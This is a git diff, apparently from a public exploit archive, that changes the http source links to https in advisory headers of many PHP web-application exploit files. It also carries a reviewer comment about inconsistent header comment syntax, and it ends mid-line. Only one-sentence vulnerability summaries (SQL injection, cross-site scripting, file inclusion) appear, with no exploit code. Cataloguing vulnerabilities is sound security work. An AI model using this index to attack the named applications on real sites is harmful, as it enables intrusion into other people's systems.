SQL injection and cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25777.txt b/exploits/php/webapps/25777.txt index 3d72153d0..8e641a0fc 100644 --- a/exploits/php/webapps/25777.txt +++ b/exploits/php/webapps/25777.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13822/info +source: https://www.securityfocus.com/bid/13822/info PowerDownload is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25778.txt b/exploits/php/webapps/25778.txt index f7721b1f3..9787be7a3 100644 --- a/exploits/php/webapps/25778.txt +++ b/exploits/php/webapps/25778.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13825/info +source: https://www.securityfocus.com/bid/13825/info Calendarix is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25779.txt b/exploits/php/webapps/25779.txt index c09c141d9..62e032b14 100644 --- a/exploits/php/webapps/25779.txt +++ b/exploits/php/webapps/25779.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13827/info +source: https://www.securityfocus.com/bid/13827/info MyBB is prone to multiple cross-site scripting and SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25786.txt b/exploits/php/webapps/25786.txt index 61d86d5e2..1b618ec22 100644 --- a/exploits/php/webapps/25786.txt +++ b/exploits/php/webapps/25786.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13849/info +source: https://www.securityfocus.com/bid/13849/info MWChat is affected by a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25787.txt b/exploits/php/webapps/25787.txt index 2ca96db44..130923006 100644 --- a/exploits/php/webapps/25787.txt +++ b/exploits/php/webapps/25787.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13850/info +source: https://www.securityfocus.com/bid/13850/info LiteWeb Server is prone to a vulnerability that may let remote attackers bypass authentication. diff --git a/exploits/php/webapps/25788.txt b/exploits/php/webapps/25788.txt index 0b0f62f55..beeb521c2 100644 --- a/exploits/php/webapps/25788.txt +++ b/exploits/php/webapps/25788.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13851/info +source: https://www.securityfocus.com/bid/13851/info Popper is affected by a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25792.txt b/exploits/php/webapps/25792.txt index c05f5a4a9..8d4798d7b 100644 --- a/exploits/php/webapps/25792.txt +++ b/exploits/php/webapps/25792.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13874/info +source: https://www.securityfocus.com/bid/13874/info YaPiG is affected by remote and local file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25793.txt b/exploits/php/webapps/25793.txt index d0dda4620..3fcd8b8cd 100644 --- a/exploits/php/webapps/25793.txt +++ b/exploits/php/webapps/25793.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13875/info +source: https://www.securityfocus.com/bid/13875/info YaPiG is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25794.txt b/exploits/php/webapps/25794.txt index 67ce85936..6019a3039 100644 --- a/exploits/php/webapps/25794.txt +++ b/exploits/php/webapps/25794.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13877/info +source: https://www.securityfocus.com/bid/13877/info YaPiG is prone to a directory traversal vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25799.txt b/exploits/php/webapps/25799.txt index 8e03d11bc..9b94a417a 100644 --- a/exploits/php/webapps/25799.txt +++ b/exploits/php/webapps/25799.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13882/info +source: https://www.securityfocus.com/bid/13882/info Multiple input validation vulnerabilities reportedly affect FlatNuke. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it in application-critical actions such as generating Web content or loading scripts. diff --git a/exploits/php/webapps/25800.txt b/exploits/php/webapps/25800.txt index 33df30a69..0e8728641 100644 --- a/exploits/php/webapps/25800.txt +++ b/exploits/php/webapps/25800.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13882/info +source: https://www.securityfocus.com/bid/13882/info Multiple input validation vulnerabilities reportedly affect FlatNuke. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it in application-critical actions such as generating Web content or loading scripts. diff --git a/exploits/php/webapps/25801.php b/exploits/php/webapps/25801.php index 1a04682b1..0c7fc71a8 100644 --- a/exploits/php/webapps/25801.php +++ b/exploits/php/webapps/25801.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13882/info +source: https://www.securityfocus.com/bid/13882/info Multiple input validation vulnerabilities reportedly affect FlatNuke. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it in application-critical actions such as generating Web content or loading scripts. diff --git a/exploits/php/webapps/25803.txt b/exploits/php/webapps/25803.txt index 3b0a995a8..2274edc24 100644 --- a/exploits/php/webapps/25803.txt +++ b/exploits/php/webapps/25803.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13897/info +source: https://www.securityfocus.com/bid/13897/info Cerberus Helpdesk is affected by various cross-site scripting vulnerabilities. 
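Review bot: in the 25801.php hunk, line 1 stays a bare `source:` line and the unchanged context after it is still plain advisory prose, so the header is not inside any PHP comment. Text outside `<?php` tags in a .php file is sent as output when the file is run, which means the advisory header is emitted verbatim. The 25904.c hunk later in this patch prefixes the same line with `//`, so the patch applies two different conventions to script files. Pick one: either leave every header untouched apart from the http to https change, or wrap the whole header block of each code file in that language's comment syntax.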
diff --git a/exploits/php/webapps/25806.txt b/exploits/php/webapps/25806.txt index d780dc176..c358ba3b9 100644 --- a/exploits/php/webapps/25806.txt +++ b/exploits/php/webapps/25806.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13907/info +source: https://www.securityfocus.com/bid/13907/info Invision Gallery is affected by an SQL injection vulnerability. diff --git a/exploits/php/webapps/25808.txt b/exploits/php/webapps/25808.txt index 2782d04e5..f84e5d4c6 100644 --- a/exploits/php/webapps/25808.txt +++ b/exploits/php/webapps/25808.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13910/info +source: https://www.securityfocus.com/bid/13910/info Multiple input validation vulnerabilities reportedly affect Invision Community Blog. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical actions. diff --git a/exploits/php/webapps/25816.txt b/exploits/php/webapps/25816.txt index 9f1ebdf88..ac1d38d07 100644 --- a/exploits/php/webapps/25816.txt +++ b/exploits/php/webapps/25816.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13927/info +source: https://www.securityfocus.com/bid/13927/info Ovidentia FX is prone to a remote file include vulnerability. diff --git a/exploits/php/webapps/25818.txt b/exploits/php/webapps/25818.txt index 8c8ac5e3c..3c0f24a08 100644 --- a/exploits/php/webapps/25818.txt +++ b/exploits/php/webapps/25818.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13938/info +source: https://www.securityfocus.com/bid/13938/info Singapore image gallery is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25819.txt b/exploits/php/webapps/25819.txt index 48bdde081..d2f3bea83 100644 --- a/exploits/php/webapps/25819.txt +++ b/exploits/php/webapps/25819.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13939/info +source: https://www.securityfocus.com/bid/13939/info FusionBB is affected by multiple vulnerabilities. These issues arise due to a failure of the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25821.txt b/exploits/php/webapps/25821.txt index 2b04b15fc..da49979f7 100644 --- a/exploits/php/webapps/25821.txt +++ b/exploits/php/webapps/25821.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13961/info +source: https://www.securityfocus.com/bid/13961/info Annuaire 1Two is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25823.txt b/exploits/php/webapps/25823.txt index 7c5c7984b..f624307ca 100644 --- a/exploits/php/webapps/25823.txt +++ b/exploits/php/webapps/25823.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13963/info +source: https://www.securityfocus.com/bid/13963/info McGallery is prone to a file disclosure vulnerability. diff --git a/exploits/php/webapps/25824.txt b/exploits/php/webapps/25824.txt index 5da0202e1..383428731 100644 --- a/exploits/php/webapps/25824.txt +++ b/exploits/php/webapps/25824.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13967/info +source: https://www.securityfocus.com/bid/13967/info paFileDB is prone to multiple input validation vulnerabilities. The following issues are reported: diff --git a/exploits/php/webapps/25825.txt b/exploits/php/webapps/25825.txt index afaa09a81..bcdc307c3 100644 --- a/exploits/php/webapps/25825.txt +++ b/exploits/php/webapps/25825.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13971/info +source: https://www.securityfocus.com/bid/13971/info Ultimate PHP Board is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. 
diff --git a/exploits/php/webapps/25826.txt b/exploits/php/webapps/25826.txt index dbbfcf5f0..fc9667c3d 100644 --- a/exploits/php/webapps/25826.txt +++ b/exploits/php/webapps/25826.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13972/info +source: https://www.securityfocus.com/bid/13972/info ATutor is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25827.txt b/exploits/php/webapps/25827.txt index 2962df25d..78d7475d8 100644 --- a/exploits/php/webapps/25827.txt +++ b/exploits/php/webapps/25827.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13972/info +source: https://www.securityfocus.com/bid/13972/info ATutor is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25828.txt b/exploits/php/webapps/25828.txt index 47c325b1b..316a26537 100644 --- a/exploits/php/webapps/25828.txt +++ b/exploits/php/webapps/25828.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13972/info +source: https://www.securityfocus.com/bid/13972/info ATutor is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25829.txt b/exploits/php/webapps/25829.txt index 101b5b4b6..85443b997 100644 --- a/exploits/php/webapps/25829.txt +++ b/exploits/php/webapps/25829.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13972/info +source: https://www.securityfocus.com/bid/13972/info ATutor is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25830.txt b/exploits/php/webapps/25830.txt index 013420d7e..dda8428d5 100644 
--- a/exploits/php/webapps/25830.txt +++ b/exploits/php/webapps/25830.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13972/info +source: https://www.securityfocus.com/bid/13972/info ATutor is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25831.txt b/exploits/php/webapps/25831.txt index cdb195890..4f1788264 100644 --- a/exploits/php/webapps/25831.txt +++ b/exploits/php/webapps/25831.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13972/info +source: https://www.securityfocus.com/bid/13972/info ATutor is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25832.txt b/exploits/php/webapps/25832.txt index e6b705585..6c25d5997 100644 --- a/exploits/php/webapps/25832.txt +++ b/exploits/php/webapps/25832.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13972/info +source: https://www.securityfocus.com/bid/13972/info ATutor is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25833.txt b/exploits/php/webapps/25833.txt index 603b262bc..ef8074853 100644 --- a/exploits/php/webapps/25833.txt +++ b/exploits/php/webapps/25833.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13972/info +source: https://www.securityfocus.com/bid/13972/info ATutor is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25834.txt b/exploits/php/webapps/25834.txt index 0764a9ea2..2f5ea8236 100644 --- a/exploits/php/webapps/25834.txt +++ b/exploits/php/webapps/25834.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13972/info +source: https://www.securityfocus.com/bid/13972/info ATutor is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25838.pl b/exploits/php/webapps/25838.pl index 3f0a9941d..59cc85e86 100755 --- a/exploits/php/webapps/25838.pl +++ b/exploits/php/webapps/25838.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13975/info +source: https://www.securityfocus.com/bid/13975/info Ultimate PHP Board is prone to a weak password encryption vulnerability. This issue is due to a failure of the application to protect passwords with a sufficiently effective encryption scheme. diff --git a/exploits/php/webapps/25840.txt b/exploits/php/webapps/25840.txt index 6d295fbcb..2833ba33b 100644 --- a/exploits/php/webapps/25840.txt +++ b/exploits/php/webapps/25840.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13979/info +source: https://www.securityfocus.com/bid/13979/info osCommerce is prone to multiple HTTP response splitting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25846.txt b/exploits/php/webapps/25846.txt index bfa78618d..9d2dafd3d 100644 --- a/exploits/php/webapps/25846.txt +++ b/exploits/php/webapps/25846.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13996/info +source: https://www.securityfocus.com/bid/13996/info It is reported that cPanel is prone to a cross-site scripting vulnerability that may allow a remote attacker to execute HTML or script code in a user's browser. The issue presents itself due to insufficient sanitization of user-supplied data via the 'user' parameter of the 'login' page. diff --git a/exploits/php/webapps/25848.pl b/exploits/php/webapps/25848.pl index 634853e86..3f5ef71a2 100755 --- a/exploits/php/webapps/25848.pl 
+++ b/exploits/php/webapps/25848.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13999/info +source: https://www.securityfocus.com/bid/13999/info paFaq is prone to an unauthorized access vulnerability regarding the database. This issue is a result of the application failing to perform access validation on the 'backup.php' script. A remote unauthenticated user can invoke the script and retrieve a complete backup of the application database. diff --git a/exploits/php/webapps/25854.txt b/exploits/php/webapps/25854.txt index 9122c3d5c..f92e27693 100644 --- a/exploits/php/webapps/25854.txt +++ b/exploits/php/webapps/25854.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14001/info +source: https://www.securityfocus.com/bid/14001/info paFaq is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25856.txt b/exploits/php/webapps/25856.txt index 5d070c1b9..c2c834cb8 100644 --- a/exploits/php/webapps/25856.txt +++ b/exploits/php/webapps/25856.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14003/info +source: https://www.securityfocus.com/bid/14003/info paFaq is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/25857.txt b/exploits/php/webapps/25857.txt index 03244fea8..8bb8974ff 100644 --- a/exploits/php/webapps/25857.txt +++ b/exploits/php/webapps/25857.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14028/info +source: https://www.securityfocus.com/bid/14028/info RaXnet Cacti is prone to a remote file include vulnerability. diff --git a/exploits/php/webapps/25859.txt b/exploits/php/webapps/25859.txt index 46743caa4..3557bd59d 100644 --- a/exploits/php/webapps/25859.txt +++ b/exploits/php/webapps/25859.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14030/info +source: https://www.securityfocus.com/bid/14030/info RaXnet Cacti is prone to a remote file include vulnerability. diff --git a/exploits/php/webapps/25860.txt b/exploits/php/webapps/25860.txt index 0c1a33fd7..16778d55e 100644 --- a/exploits/php/webapps/25860.txt +++ b/exploits/php/webapps/25860.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14033/info +source: https://www.securityfocus.com/bid/14033/info DUamazon Pro is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/25861.txt b/exploits/php/webapps/25861.txt index a2a43cc28..114a3d47a 100644 --- a/exploits/php/webapps/25861.txt +++ b/exploits/php/webapps/25861.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14033/info +source: https://www.securityfocus.com/bid/14033/info DUamazon Pro is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/25862.txt b/exploits/php/webapps/25862.txt index e7cd2be12..46cd879fd 100644 --- a/exploits/php/webapps/25862.txt +++ b/exploits/php/webapps/25862.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14033/info +source: https://www.securityfocus.com/bid/14033/info DUamazon Pro is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/25875.txt b/exploits/php/webapps/25875.txt index f61cc8a53..1e607adac 100644 --- a/exploits/php/webapps/25875.txt +++ b/exploits/php/webapps/25875.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14044/info +source: https://www.securityfocus.com/bid/14044/info Whois.Cart is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25876.txt b/exploits/php/webapps/25876.txt index 9e2cf9e33..308ac2afb 100644 --- a/exploits/php/webapps/25876.txt +++ b/exploits/php/webapps/25876.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14045/info +source: https://www.securityfocus.com/bid/14045/info Forum Russian Board is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out SQL Injection, cross-site scripting, and HTML injection attacks. diff --git a/exploits/php/webapps/25877.txt b/exploits/php/webapps/25877.txt index 55146a060..6783100e9 100644 --- a/exploits/php/webapps/25877.txt +++ b/exploits/php/webapps/25877.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14045/info +source: https://www.securityfocus.com/bid/14045/info Forum Russian Board is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out SQL Injection, cross-site scripting, and HTML injection attacks. diff --git a/exploits/php/webapps/25878.txt b/exploits/php/webapps/25878.txt index 9a63ef2c8..548e2119c 100644 --- a/exploits/php/webapps/25878.txt +++ b/exploits/php/webapps/25878.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14045/info +source: https://www.securityfocus.com/bid/14045/info Forum Russian Board is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out SQL Injection, cross-site scripting, and HTML injection attacks. diff --git a/exploits/php/webapps/25879.txt b/exploits/php/webapps/25879.txt index cfb7e0610..c39306a9b 100644 --- a/exploits/php/webapps/25879.txt +++ b/exploits/php/webapps/25879.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14045/info +source: https://www.securityfocus.com/bid/14045/info Forum Russian Board is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out SQL Injection, cross-site scripting, and HTML injection attacks. diff --git a/exploits/php/webapps/25880.txt b/exploits/php/webapps/25880.txt index 5e4d5aa2a..58d8a04f3 100644 --- a/exploits/php/webapps/25880.txt +++ b/exploits/php/webapps/25880.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14045/info +source: https://www.securityfocus.com/bid/14045/info Forum Russian Board is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out SQL Injection, cross-site scripting, and HTML injection attacks. diff --git a/exploits/php/webapps/25881.txt b/exploits/php/webapps/25881.txt index ab32ec864..a6bea2ddc 100644 --- a/exploits/php/webapps/25881.txt +++ b/exploits/php/webapps/25881.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14045/info +source: https://www.securityfocus.com/bid/14045/info Forum Russian Board is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out SQL Injection, cross-site scripting, and HTML injection attacks. diff --git a/exploits/php/webapps/25882.txt b/exploits/php/webapps/25882.txt index 3724b3354..fdd9a9a8b 100644 --- a/exploits/php/webapps/25882.txt +++ b/exploits/php/webapps/25882.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14045/info +source: https://www.securityfocus.com/bid/14045/info Forum Russian Board is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out SQL Injection, cross-site scripting, and HTML injection attacks. diff --git a/exploits/php/webapps/25884.txt b/exploits/php/webapps/25884.txt index 511956ca3..02bc764d8 100644 --- a/exploits/php/webapps/25884.txt +++ b/exploits/php/webapps/25884.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14045/info +source: https://www.securityfocus.com/bid/14045/info Forum Russian Board is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out SQL Injection, cross-site scripting, and HTML injection attacks. diff --git a/exploits/php/webapps/25885.txt b/exploits/php/webapps/25885.txt index c5a240160..20febb8ee 100644 --- a/exploits/php/webapps/25885.txt +++ b/exploits/php/webapps/25885.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14045/info +source: https://www.securityfocus.com/bid/14045/info Forum Russian Board is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out SQL Injection, cross-site scripting, and HTML injection attacks. diff --git a/exploits/php/webapps/25886.txt b/exploits/php/webapps/25886.txt index df9bbe14e..96c1fbba5 100644 --- a/exploits/php/webapps/25886.txt +++ b/exploits/php/webapps/25886.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14045/info +source: https://www.securityfocus.com/bid/14045/info Forum Russian Board is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out SQL Injection, cross-site scripting, and HTML injection attacks. diff --git a/exploits/php/webapps/25887.txt b/exploits/php/webapps/25887.txt index 0826cb2d6..1a41ba037 100644 --- a/exploits/php/webapps/25887.txt +++ b/exploits/php/webapps/25887.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14045/info +source: https://www.securityfocus.com/bid/14045/info Forum Russian Board is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out SQL Injection, cross-site scripting, and HTML injection attacks. diff --git a/exploits/php/webapps/25888.txt b/exploits/php/webapps/25888.txt index f29b80e60..f3b05c611 100644 --- a/exploits/php/webapps/25888.txt +++ b/exploits/php/webapps/25888.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14045/info +source: https://www.securityfocus.com/bid/14045/info Forum Russian Board is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out SQL Injection, cross-site scripting, and HTML injection attacks. diff --git a/exploits/php/webapps/25889.txt b/exploits/php/webapps/25889.txt index 6b4d74967..c371733b7 100644 --- a/exploits/php/webapps/25889.txt +++ b/exploits/php/webapps/25889.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14045/info +source: https://www.securityfocus.com/bid/14045/info Forum Russian Board is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out SQL Injection, cross-site scripting, and HTML injection attacks. diff --git a/exploits/php/webapps/25890.txt b/exploits/php/webapps/25890.txt index d4e48f6ef..ddb1fcdcc 100644 --- a/exploits/php/webapps/25890.txt +++ b/exploits/php/webapps/25890.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14045/info +source: https://www.securityfocus.com/bid/14045/info Forum Russian Board is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out SQL Injection, cross-site scripting, and HTML injection attacks. diff --git a/exploits/php/webapps/25891.txt b/exploits/php/webapps/25891.txt index f2289e145..ac21bd189 100644 --- a/exploits/php/webapps/25891.txt +++ b/exploits/php/webapps/25891.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14045/info +source: https://www.securityfocus.com/bid/14045/info Forum Russian Board is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out SQL Injection, cross-site scripting, and HTML injection attacks. diff --git a/exploits/php/webapps/25892.txt b/exploits/php/webapps/25892.txt index 792458f1d..00404a35c 100644 --- a/exploits/php/webapps/25892.txt +++ b/exploits/php/webapps/25892.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14045/info +source: https://www.securityfocus.com/bid/14045/info Forum Russian Board is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out SQL Injection, cross-site scripting, and HTML injection attacks. diff --git a/exploits/php/webapps/25893.txt b/exploits/php/webapps/25893.txt index 85c410229..482b12df8 100644 --- a/exploits/php/webapps/25893.txt +++ b/exploits/php/webapps/25893.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14045/info +source: https://www.securityfocus.com/bid/14045/info Forum Russian Board is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out SQL Injection, cross-site scripting, and HTML injection attacks. diff --git a/exploits/php/webapps/25894.txt b/exploits/php/webapps/25894.txt index ac3876852..07e26a916 100644 --- a/exploits/php/webapps/25894.txt +++ b/exploits/php/webapps/25894.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14045/info +source: https://www.securityfocus.com/bid/14045/info Forum Russian Board is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out SQL Injection, cross-site scripting, and HTML injection attacks. diff --git a/exploits/php/webapps/25895.txt b/exploits/php/webapps/25895.txt index ffe18133f..e8d6f0fcc 100644 --- a/exploits/php/webapps/25895.txt +++ b/exploits/php/webapps/25895.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14045/info +source: https://www.securityfocus.com/bid/14045/info Forum Russian Board is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out SQL Injection, cross-site scripting, and HTML injection attacks. diff --git a/exploits/php/webapps/25897.txt b/exploits/php/webapps/25897.txt index 9d16f7024..29133795a 100644 --- a/exploits/php/webapps/25897.txt +++ b/exploits/php/webapps/25897.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14052/info +source: https://www.securityfocus.com/bid/14052/info UBB.Threads is prone to multiple SQL injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/25898.txt b/exploits/php/webapps/25898.txt index 3cc4c0be9..98b25d02d 100644 --- a/exploits/php/webapps/25898.txt +++ b/exploits/php/webapps/25898.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14052/info +source: https://www.securityfocus.com/bid/14052/info UBB.Threads is prone to multiple SQL injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/25899.txt b/exploits/php/webapps/25899.txt index cb1a20353..bcd56c86d 100644 --- a/exploits/php/webapps/25899.txt +++ b/exploits/php/webapps/25899.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14052/info +source: https://www.securityfocus.com/bid/14052/info UBB.Threads is prone to multiple SQL injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/25900.txt b/exploits/php/webapps/25900.txt index 7b835ce86..3e08c3a82 100644 --- a/exploits/php/webapps/25900.txt +++ b/exploits/php/webapps/25900.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14052/info +source: https://www.securityfocus.com/bid/14052/info UBB.Threads is prone to multiple SQL injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/25901.txt b/exploits/php/webapps/25901.txt index ca6d618e9..148f969ae 100644 --- a/exploits/php/webapps/25901.txt +++ b/exploits/php/webapps/25901.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14052/info +source: https://www.securityfocus.com/bid/14052/info UBB.Threads is prone to multiple SQL injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/25902.txt b/exploits/php/webapps/25902.txt index c06dbd410..a362a20c8 100644 --- a/exploits/php/webapps/25902.txt +++ b/exploits/php/webapps/25902.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14052/info +source: https://www.securityfocus.com/bid/14052/info UBB.Threads is prone to multiple SQL injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/25903.txt b/exploits/php/webapps/25903.txt index 3e343d8d6..2ae83059b 100644 --- a/exploits/php/webapps/25903.txt +++ b/exploits/php/webapps/25903.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14052/info +source: https://www.securityfocus.com/bid/14052/info UBB.Threads is prone to multiple SQL injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/25904.c b/exploits/php/webapps/25904.c index ecdb52a94..eaa81033f 100644 --- a/exploits/php/webapps/25904.c +++ b/exploits/php/webapps/25904.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14059/info +// source: 